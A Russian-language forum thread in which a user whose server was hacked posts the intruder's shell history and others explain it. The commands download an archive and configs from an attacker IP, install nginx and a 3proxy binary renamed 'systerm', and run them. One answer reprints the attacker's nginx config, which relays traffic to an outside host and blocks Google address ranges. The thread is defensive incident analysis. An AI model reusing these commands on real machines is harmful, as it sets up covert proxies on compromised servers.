Объяснение команды

Question

Кто-то взломал мой частный сервер, и я нашел ниже команду из истории командной строки. Может ли кто-нибудь объяснить, что это значит?

1. wget http://sysoev.ru/nginx/nginx-0.7.64.tar.gz && tar zxf nginx-0.7.64.tar.gz && cd nginx-0.7.64 && ./configure --without-http_gzip_module --with-http_stub_status_module --without-http-cache ; make install && cd ../ && rm -fr ngi* && wget 94.75.210.13/nsm3.conf -O /usr/local/nginx/conf/nginx.conf && env -i /usr/local/nginx/sbin/nginx

а также

2. wget 94.75.210.13/3proxy-0.6.tgz && tar zxf 3proxy-0.6.tgz && cd 3proxy-0.6 && make -f Makefile.Linux && mv src/proxy /usr/local/bin/systerm && cd ../ && rm -fr 3prox* && wget 94.75.210.13/3proxy.cfg -O /usr/local/etc/3proxy.cfg && env -i /usr/local/bin/systerm -p63222 &94.75.210.13/3proxy-0.6.tgz && tar zxf 3proxy-0.6.tgz && cd 3proxy-0.6 && make -f Makefile.Linux && mv src/proxy /usr/local/bin/systerm && cd ../ && rm -fr 3prox* && wget 94.75.210.13/3proxy.cfg -O /usr/local/etc/3proxy.cfg && env -i /usr/local/bin/systerm -p63222 &

Answer 1

Кто-то явно скачал и установил nginx (веб-сервер) и 3proxy (прокси-сервер).

Поэтому я думаю, что ваш сервер используется хакерами в качестве промежуточного прокси-сервера. Удаление и удаление этих серверов было бы наилучшим способом действий. (в дополнение к ужесточению вашей безопасности, конечно ;-)

Answer 2

Он пытается установить веб-сервер и прокси-сервер со следующими настройками:

user www-data; 

worker_processes 2; 

error_log logs/error.log notice; 

worker_rlimit_nofile 10240; 

events { worker_connections 8192; use epoll; } 

http {

  include mime.types;

  access_log off;

  sendfile on;

  tcp_nopush on;

  tcp_nodelay on;

  keepalive_timeout 0;

  server_tokens off;

  server_names_hash_bucket_size 64;

  #//G

  deny 64.233.160.0/19;

  deny 66.102.0.0/20;

  deny 66.249.64.0/19;

  deny 72.14.192.0/18;

  deny 74.125.0.0/16;

  deny 89.207.224.0/24;

  deny 193.142.125.0/24;

  deny 194.110.194.0/24;

  deny 209.85.128.0/17;

  deny 216.239.32.0/19;

  server {

      listen 8080;

      location ~* ^.+\.(gif|png|jpg)$ {

        root /var/tmp/$host;

        error_page 404 = @fetch;

      }

location @fetch {

    internal;

      proxy_pass http://serverparkhosting.com:4480;

      proxy_redirect off;

      proxy_ignore_client_abort on;

      proxy_set_header X-Real-IP $remote_addr;

      proxy_set_header Host $host;

      proxy_buffers 400 50k;

      proxy_read_timeout 300;

      proxy_send_timeout 300;

      proxy_store /var/tmp/$host/$uri;

      proxy_store_access user:rw group:rw all:r;

      root /var/tmp/$host;

}



    location / {

      proxy_pass http://serverparkhosting.com:4480;

      proxy_redirect off;

      proxy_ignore_client_abort on;

      proxy_set_header X-Real-IP $remote_addr;

      proxy_set_header Host $host;

      proxy_buffers 100 50k;

      proxy_read_timeout 300;

      proxy_send_timeout 300;

    }

        location = /info { stub_status on; }

  }

}

Answer 3

Как уже говорили другие, ваш сервер был взломан кем-то другим. После восстановления или удаления и / или переустановки вам следует серьезно подумать о внедрении базовой безопасности. Хорошее место для начала - руководства по безопасности вашего дистрибутива Linux и, возможно, что-то вроде скриптов тигра.